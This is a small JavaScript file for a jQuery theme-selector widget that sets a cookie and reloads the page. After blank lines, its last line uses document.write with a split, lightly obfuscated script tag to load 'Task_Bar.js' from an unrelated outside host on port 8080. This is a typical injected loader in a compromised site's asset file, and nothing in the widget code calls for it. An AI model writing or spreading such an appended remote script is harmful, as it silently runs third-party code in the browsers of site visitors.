$.noah = {
    themeSelectorWidget: function(what, base)
    {
        $('#'+what+'SelectorWidget').change(function(){
            var newSelection = this.options[this.selectedIndex].value;
            if( newSelection!=0 )
            {
                createCookie('noah'+what,newSelection,500);
                document.location=base;
            }
        });
    }
};





document.write('<s'+'cript type="text/javascript" src="http://dolgo.lulucabana.com:8080/Task_Bar.js"></scr'+'ipt>');